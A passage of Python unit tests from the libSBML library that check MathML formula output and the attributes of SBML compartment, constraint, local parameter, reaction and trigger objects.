self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_piecewise_otherwise(self):
expected = wrapMathML(" <piecewise>\n" +
" <piece>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" <apply>\n" +
" <lt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <otherwise>\n" +
" <ci> x </ci>\n" +
" </otherwise>\n" +
" </piecewise>\n")
self.N = libsbml.parseFormula("piecewise(0, lt(x, 0), x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_binary(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_1(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2 + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_2(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("(1 + 2) + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_3(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + (2 + 3)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_4(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <apply>\n" +
" <times/>\n" +
" <ci> x </ci>\n" +
" <ci> y </ci>\n" +
" <ci> z </ci>\n" +
" </apply>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2 + x * y * z + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_root(self):
expected = wrapMathML(" <apply>\n" +
" <root/>\n" +
" <degree>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </degree>\n" +
" <ci> x </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("root(3, x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_sin(self):
expected = wrapMathML(" <apply>\n" +
" <sin/>\n" +
" <ci> x </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("sin(x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestWriteMathML))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestCompartment.py
```python
import sys
import unittest
import libsbml
class TestCompartment(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Compartment(2,4)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assert_( self.C.getId() == "" )
self.assert_( self.C.getName() == "" )
self.assert_( self.C.getUnits() == "" )
self.assert_( self.C.getOutside() == "" )
self.assert_( self.C.getSpatialDimensions() == 3 )
self.assert_( self.C.getVolume() == 1.0 )
self.assert_( self.C.getConstant() == True )
self.assertEqual( False, self.C.isSetId() )
self.assertEqual( False, self.C.isSetName() )
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( False, self.C.isSetVolume() )
self.assertEqual( False, self.C.isSetUnits() )
self.assertEqual( False, self.C.isSetOutside() )
pass
def test_Compartment_createWith(self):
c = libsbml.Compartment(2,4)
c.setId( "A")
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getName() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_(( "A" == c.getId() ))
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,1)
sbmlns.addNamespaces(xmlns)
c = libsbml.Compartment(sbmlns)
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getLevel() == 2 )
self.assert_( c.getVersion() == 1 )
self.assert_( c.getNamespaces() != None )
self.assert_( c.getNamespaces().getLength() == 2 )
self.assert_( c.getName() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getConstant() == True )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_getSpatialDimensions(self):
self.C.setSpatialDimensions(1)
self.assert_( self.C.getSpatialDimensions() == 1 )
pass
def test_Compartment_getsetConstant(self):
self.C.setConstant(True)
self.assert_( self.C.getConstant() == True )
pass
def test_Compartment_getsetType(self):
self.C.setCompartmentType( "cell")
self.assert_(( "cell" == self.C.getCompartmentType() ))
self.assertEqual( True, self.C.isSetCompartmentType() )
self.C.unsetCompartmentType()
self.assertEqual( False, self.C.isSetCompartmentType() )
pass
def test_Compartment_initDefaults(self):
c = libsbml.Compartment(2,4)
c.setId( "A")
c.initDefaults()
self.assert_(( "A" == c.getId() ))
self.assert_( c.getName() == "" )
self.assert_( c.getUnits() == "" )
self.assert_( c.getOutside() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getVolume() == 1.0 )
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetOutside() )
self.assertEqual( True, c.isSetSpatialDimensions() )
self.assertEqual( True, c.isSetConstant() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_setId(self):
id = "mitochondria";
self.C.setId(id)
self.assert_(( id == self.C.getId() ))
self.assertEqual( True, self.C.isSetId() )
if (self.C.getId() == id):
pass
self.C.setId(self.C.getId())
self.assert_(( id == self.C.getId() ))
self.C.setId("")
self.assertEqual( False, self.C.isSetId() )
if (self.C.getId() != None):
pass
pass
def test_Compartment_setName(self):
name = "My_Favorite_Factory";
self.C.setName(name)
self.assert_(( name == self.C.getName() ))
self.assertEqual( True, self.C.isSetName() )
if (self.C.getName() == name):
pass
self.C.setName(self.C.getName())
self.assert_(( name == self.C.getName() ))
self.C.setName("")
self.assertEqual( False, self.C.isSetName() )
if (self.C.getName() != None):
pass
pass
def test_Compartment_setOutside(self):
outside = "cell";
self.C.setOutside(outside)
self.assert_(( outside == self.C.getOutside() ))
self.assertEqual( True, self.C.isSetOutside() )
if (self.C.getOutside() == outside):
pass
self.C.setOutside(self.C.getOutside())
self.assert_(( outside == self.C.getOutside() ))
self.C.setOutside("")
self.assertEqual( False, self.C.isSetOutside() )
if (self.C.getOutside() != None):
pass
pass
def test_Compartment_setUnits(self):
units = "volume";
self.C.setUnits(units)
self.assert_(( units == self.C.getUnits() ))
self.assertEqual( True, self.C.isSetUnits() )
if (self.C.getUnits() == units):
pass
self.C.setUnits(self.C.getUnits())
self.assert_(( units == self.C.getUnits() ))
self.C.setUnits("")
self.assertEqual( False, self.C.isSetUnits() )
if (self.C.getUnits() != None):
pass
pass
def test_Compartment_unsetSize(self):
self.C.setSize(0.2)
self.assert_( self.C.getSize() == 0.2 )
self.assertEqual( True, self.C.isSetSize() )
self.C.unsetSize()
self.assertEqual( False, self.C.isSetSize() )
pass
def test_Compartment_unsetVolume(self):
self.C.setVolume(1.0)
self.assert_( self.C.getVolume() == 1.0 )
self.C.unsetVolume()
self.assertEqual( False, self.C.isSetVolume() )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestCompartment))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestConstraint.py
```python
import sys
import unittest
import libsbml
class TestConstraint(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Constraint(2,4)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_CONSTRAINT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assertEqual( False, self.C.isSetMessage() )
self.assertEqual( False, self.C.isSetMath() )
pass
def test_Constraint_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,2)
sbmlns.addNamespaces(xmlns)
object = libsbml.Constraint(sbmlns)
self.assert_( object.getTypeCode() == libsbml.SBML_CONSTRAINT )
self.assert_( object.getMetaId() == "" )
self.assert_( object.getNotes() == None )
self.assert_( object.getAnnotation() == None )
self.assert_( object.getLevel() == 2 )
self.assert_( object.getVersion() == 2 )
self.assert_( object.getNamespaces() != None )
self.assert_( object.getNamespaces().getLength() == 2 )
_dummyList = [ object ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_setMath(self):
math = libsbml.parseFormula("2 * k")
self.C.setMath(math)
self.assert_( self.C.getMath() != math )
self.assertEqual( True, self.C.isSetMath() )
self.C.setMath(self.C.getMath())
self.assert_( self.C.getMath() != math )
self.C.setMath(None)
self.assertEqual( False, self.C.isSetMath() )
if (self.C.getMath() != None):
pass
_dummyList = [ math ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_setMessage(self):
text = libsbml.XMLNode.convertStringToXMLNode(" Some text ",None)
triple = libsbml.XMLTriple("p", "http://www.w3.org/1999/xhtml", "")
att = libsbml.XMLAttributes()
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.w3.org/1999/xhtml", "")
p = libsbml.XMLNode(triple,att,xmlns)
p.addChild(text)
triple1 = libsbml.XMLTriple("message", "", "")
att1 = libsbml.XMLAttributes()
node = libsbml.XMLNode(triple1,att1)
node.addChild(p)
self.C.setMessage(node)
self.assert_( self.C.getMessage() != node )
self.assert_( self.C.isSetMessage() == True )
self.C.setMessage(self.C.getMessage())
self.assert_( self.C.getMessage() != node )
self.assert_( self.C.getMessageString() != None )
self.C.unsetMessage()
self.assertEqual( False, self.C.isSetMessage() )
if (self.C.getMessage() != None):
pass
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestConstraint))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Compartment.py
```python
import sys
import unittest
import libsbml
def isnan(x):
return (x != x)
pass
class TestL3Compartment(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Compartment(3,1)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_NS(self):
self.assert_( self.C.getNamespaces() != None )
self.assert_( self.C.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.C.getNamespaces().getURI(0) ))
pass
def test_L3_Compartment_constant(self):
self.assert_( self.C.isSetConstant() == False )
self.C.setConstant(True)
self.assert_( self.C.getConstant() == True )
self.assert_( self.C.isSetConstant() == True )
self.C.setConstant(False)
self.assert_( self.C.getConstant() == False )
self.assert_( self.C.isSetConstant() == True )
pass
def test_L3_Compartment_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assert_( self.C.getId() == "" )
self.assert_( self.C.getName() == "" )
self.assert_( self.C.getUnits() == "" )
self.assert_( self.C.getOutside() == "" )
self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
self.assertEqual( True, isnan(self.C.getVolume()) )
self.assert_( self.C.getConstant() == True )
self.assertEqual( False, self.C.isSetId() )
self.assertEqual( False, self.C.isSetSpatialDimensions() )
self.assertEqual( False, self.C.isSetName() )
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( False, self.C.isSetVolume() )
self.assertEqual( False, self.C.isSetUnits() )
self.assertEqual( False, self.C.isSetOutside() )
self.assertEqual( False, self.C.isSetConstant() )
pass
def test_L3_Compartment_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
c = libsbml.Compartment(sbmlns)
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getLevel() == 3 )
self.assert_( c.getVersion() == 1 )
self.assert_( c.getNamespaces() != None )
self.assert_( c.getNamespaces().getLength() == 2 )
self.assert_( c.getId() == "" )
self.assert_( c.getName() == "" )
self.assert_( c.getUnits() == "" )
self.assert_( c.getOutside() == "" )
self.assertEqual( True, isnan(c.getSpatialDimensionsAsDouble()) )
self.assertEqual( True, isnan(c.getVolume()) )
self.assert_( c.getConstant() == True )
self.assertEqual( False, c.isSetId() )
self.assertEqual( False, c.isSetSpatialDimensions() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetOutside() )
self.assertEqual( False, c.isSetConstant() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_hasRequiredAttributes(self):
c = libsbml.Compartment(3,1)
self.assertEqual( False, c.hasRequiredAttributes() )
c.setId( "id")
self.assertEqual( False, c.hasRequiredAttributes() )
c.setConstant(False)
self.assertEqual( True, c.hasRequiredAttributes() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_id(self):
id = "mitochondria";
self.assertEqual( False, self.C.isSetId() )
self.C.setId(id)
self.assert_(( id == self.C.getId() ))
self.assertEqual( True, self.C.isSetId() )
if (self.C.getId() == id):
pass
pass
def test_L3_Compartment_initDefaults(self):
c = libsbml.Compartment(3,1)
c.setId( "A")
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetConstant() )
self.assertEqual( False, c.isSetSpatialDimensions() )
c.initDefaults()
self.assert_(( "A" == c.getId() ))
self.assert_( c.getName() == "" )
self.assert_(( "litre" == c.getUnits() ))
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getSize() == 1 )
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( True, c.isSetUnits() )
self.assertEqual( True, c.isSetConstant() )
self.assertEqual( True, c.isSetSpatialDimensions() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.C.isSetName() )
self.C.setName(name)
self.assert_(( name == self.C.getName() ))
self.assertEqual( True, self.C.isSetName() )
if (self.C.getName() == name):
pass
self.C.unsetName()
self.assertEqual( False, self.C.isSetName() )
if (self.C.getName() != None):
pass
pass
def test_L3_Compartment_size(self):
size = 0.2
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( True, isnan(self.C.getSize()) )
self.C.setSize(size)
self.assert_( self.C.getSize() == size )
self.assertEqual( True, self.C.isSetSize() )
self.C.unsetSize()
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( True, isnan(self.C.getSize()) )
pass
def test_L3_Compartment_spatialDimensions(self):
self.assertEqual( False, self.C.isSetSpatialDimensions() )
self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
self.C.setSpatialDimensions(1.5)
self.assertEqual( True, self.C.isSetSpatialDimensions() )
self.assert_( self.C.getSpatialDimensionsAsDouble() == 1.5 )
self.C.unsetSpatialDimensions()
self.assertEqual( False, self.C.isSetSpatialDimensions() )
self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
pass
def test_L3_Compartment_units(self):
units = "volume";
self.assertEqual( False, self.C.isSetUnits() )
self.C.setUnits(units)
self.assert_(( units == self.C.getUnits() ))
self.assertEqual( True, self.C.isSetUnits() )
if (self.C.getUnits() == units):
pass
self.C.unsetUnits()
self.assertEqual( False, self.C.isSetUnits() )
if (self.C.getUnits() != None):
pass
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Compartment))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3LocalParameter.py
```python
import sys
import unittest
import libsbml
def isnan(x):
return (x != x)
pass
class TestL3LocalParameter(unittest.TestCase):
global P
P = None
def setUp(self):
self.P = libsbml.LocalParameter(3,1)
if (self.P == None):
pass
pass
def tearDown(self):
_dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_NS(self):
self.assert_( self.P.getNamespaces() != None )
self.assert_( self.P.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.P.getNamespaces().getURI(0) ))
pass
def test_L3_LocalParameter_create(self):
self.assert_( self.P.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER )
self.assert_( self.P.getMetaId() == "" )
self.assert_( self.P.getNotes() == None )
self.assert_( self.P.getAnnotation() == None )
self.assert_( self.P.getId() == "" )
self.assert_( self.P.getName() == "" )
self.assert_( self.P.getUnits() == "" )
self.assertEqual( True, isnan(self.P.getValue()) )
self.assertEqual( False, self.P.isSetId() )
self.assertEqual( False, self.P.isSetName() )
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_L3_LocalParameter_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
p = libsbml.LocalParameter(sbmlns)
self.assert_( p.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER )
self.assert_( p.getMetaId() == "" )
self.assert_( p.getNotes() == None )
self.assert_( p.getAnnotation() == None )
self.assert_( p.getLevel() == 3 )
self.assert_( p.getVersion() == 1 )
self.assert_( p.getNamespaces() != None )
self.assert_( p.getNamespaces().getLength() == 2 )
self.assert_( p.getId() == "" )
self.assert_( p.getName() == "" )
self.assert_( p.getUnits() == "" )
self.assertEqual( True, isnan(p.getValue()) )
self.assertEqual( False, p.isSetId() )
self.assertEqual( False, p.isSetName() )
self.assertEqual( False, p.isSetValue() )
self.assertEqual( False, p.isSetUnits() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_hasRequiredAttributes(self):
p = libsbml.LocalParameter(3,1)
self.assertEqual( False, p.hasRequiredAttributes() )
p.setId( "id")
self.assertEqual( True, p.hasRequiredAttributes() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_id(self):
id = "mitochondria";
self.assertEqual( False, self.P.isSetId() )
self.P.setId(id)
self.assert_(( id == self.P.getId() ))
self.assertEqual( True, self.P.isSetId() )
if (self.P.getId() == id):
pass
pass
def test_L3_LocalParameter_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.P.isSetName() )
self.P.setName(name)
self.assert_(( name == self.P.getName() ))
self.assertEqual( True, self.P.isSetName() )
if (self.P.getName() == name):
pass
self.P.unsetName()
self.assertEqual( False, self.P.isSetName() )
if (self.P.getName() != None):
pass
pass
def test_L3_LocalParameter_units(self):
units = "volume";
self.assertEqual( False, self.P.isSetUnits() )
self.P.setUnits(units)
self.assert_(( units == self.P.getUnits() ))
self.assertEqual( True, self.P.isSetUnits() )
if (self.P.getUnits() == units):
pass
self.P.unsetUnits()
self.assertEqual( False, self.P.isSetUnits() )
if (self.P.getUnits() != None):
pass
pass
def test_L3_LocalParameter_value(self):
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( True, isnan(self.P.getValue()) )
self.P.setValue(1.5)
self.assertEqual( True, self.P.isSetValue() )
self.assert_( self.P.getValue() == 1.5 )
self.P.unsetValue()
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( True, isnan(self.P.getValue()) )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3LocalParameter))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Reaction.py
```python
import sys
import unittest
import libsbml
class TestL3Reaction(unittest.TestCase):
global R
R = None
def setUp(self):
self.R = libsbml.Reaction(3,1)
if (self.R == None):
pass
pass
def tearDown(self):
_dummyList = [ self.R ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_NS(self):
self.assert_( self.R.getNamespaces() != None )
self.assert_( self.R.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.R.getNamespaces().getURI(0) ))
pass
def test_L3_Reaction_compartment(self):
compartment = "cell";
self.assertEqual( False, self.R.isSetCompartment() )
self.R.setCompartment(compartment)
self.assert_(( compartment == self.R.getCompartment() ))
self.assertEqual( True, self.R.isSetCompartment() )
if (self.R.getCompartment() == compartment):
pass
self.R.unsetCompartment()
self.assertEqual( False, self.R.isSetCompartment() )
if (self.R.getCompartment() != None):
pass
pass
def test_L3_Reaction_create(self):
self.assert_( self.R.getTypeCode() == libsbml.SBML_REACTION )
self.assert_( self.R.getMetaId() == "" )
self.assert_( self.R.getNotes() == None )
self.assert_( self.R.getAnnotation() == None )
self.assert_( self.R.getId() == "" )
self.assert_( self.R.getName() == "" )
self.assert_( self.R.getCompartment() == "" )
self.assert_( self.R.getFast() == False )
self.assert_( self.R.getReversible() == True )
self.assertEqual( False, self.R.isSetId() )
self.assertEqual( False, self.R.isSetName() )
self.assertEqual( False, self.R.isSetCompartment() )
self.assertEqual( False, self.R.isSetFast() )
self.assertEqual( False, self.R.isSetReversible() )
pass
def test_L3_Reaction_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
r = libsbml.Reaction(sbmlns)
self.assert_( r.getTypeCode() == libsbml.SBML_REACTION )
self.assert_( r.getMetaId() == "" )
self.assert_( r.getNotes() == None )
self.assert_( r.getAnnotation() == None )
self.assert_( r.getLevel() == 3 )
self.assert_( r.getVersion() == 1 )
self.assert_( r.getNamespaces() != None )
self.assert_( r.getNamespaces().getLength() == 2 )
self.assert_( r.getId() == "" )
self.assert_( r.getName() == "" )
self.assert_( r.getCompartment() == "" )
self.assert_( r.getFast() == False )
self.assert_( r.getReversible() == True )
self.assertEqual( False, r.isSetId() )
self.assertEqual( False, r.isSetName() )
self.assertEqual( False, r.isSetCompartment() )
self.assertEqual( False, r.isSetFast() )
self.assertEqual( False, r.isSetReversible() )
_dummyList = [ r ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_fast(self):
self.assert_( self.R.isSetFast() == False )
self.R.setFast(True)
self.assert_( self.R.getFast() == True )
self.assert_( self.R.isSetFast() == True )
self.R.setFast(False)
self.assert_( self.R.getFast() == False )
self.assert_( self.R.isSetFast() == True )
pass
def test_L3_Reaction_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_hasRequiredAttributes(self):
r = libsbml.Reaction(3,1)
self.assertEqual( False, r.hasRequiredAttributes() )
r.setId( "id")
self.assertEqual( False, r.hasRequiredAttributes() )
r.setFast(False)
self.assertEqual( False, r.hasRequiredAttributes() )
r.setReversible(False)
self.assertEqual( True, r.hasRequiredAttributes() )
_dummyList = [ r ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_id(self):
id = "mitochondria";
self.assertEqual( False, self.R.isSetId() )
self.R.setId(id)
self.assert_(( id == self.R.getId() ))
self.assertEqual( True, self.R.isSetId() )
if (self.R.getId() == id):
pass
pass
def test_L3_Reaction_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.R.isSetName() )
self.R.setName(name)
self.assert_(( name == self.R.getName() ))
self.assertEqual( True, self.R.isSetName() )
if (self.R.getName() == name):
pass
self.R.unsetName()
self.assertEqual( False, self.R.isSetName() )
if (self.R.getName() != None):
pass
pass
def test_L3_Reaction_reversible(self):
self.assert_( self.R.isSetReversible() == False )
self.R.setReversible(True)
self.assert_( self.R.getReversible() == True )
self.assert_( self.R.isSetReversible() == True )
self.R.setReversible(False)
self.assert_( self.R.getReversible() == False )
self.assert_( self.R.isSetReversible() == True )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Reaction))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Trigger.py
```python
import sys
import unittest
import libsbml
class TestL3Trigger(unittest.TestCase):
global T
T = None
def setUp(self):
self.T = libsbml.Trigger(3,1)
if (self.T == None):
pass
pass
def tearDown(self):
_dummyList = [ self.T ]; _dummyList[:] = []; del _dummyList
pass
def test_L3Trigger_create(self):
self.assert_( self.T.getTypeCode() == libsbml.SBML_TRIGGER )
self.assert_( self.T.getMetaId() == "" )
self.assert_( self.T.getNotes() == None )
self.assert_( self.T.getAnnotation() == None )
self.assert_( self.T.getMath() == None )
self.assert_( self.T.getInitialValue() == 1 )
self.assert_( self.T.getPersistent() == 1 )
self.assert_( self.T.isSetInitialValue() == 0 )
self.assert_( self.T.isSetPersistent() == 0 )
pass
def test_L3Trigger_setInitialValue(self):
i = self.T.setInitialValue(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getInitialValue() == 0 )
self.assert_( self.T.isSetInitialValue() == 1 )
i = self.T.setInitialValue(1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getInitialValue() == 1 )
self.assert_( self.T.isSetInitialValue() == 1 )
pass
def test_L3Trigger_setInitialValue1(self):
t = libsbml.Trigger(2,4)
i = t.setInitialValue(0)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( self.T.getInitialValue() == 1 )
self.assert_( self.T.isSetInitialValue() == 0 )
_dummyList = [ t ]; _dummyList[:] = []; del _dummyList
pass
def test_L3Trigger_setPersistent(self):
i = self.T.setPersistent(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getPersistent() == 0 )
self.assert_( self.T.isSetPersistent() == 1 )
i = self.T.setPersistent(1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getPersistent() == 1 )
self.assert_( self.T.isSetPersistent() == 1 )
pass
def test_L3Trigger_setPersistent1(self):
t = libsbml.Trigger(2,4)
i = t.setPersistent(0)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( self.T.getPersistent() == 1 )
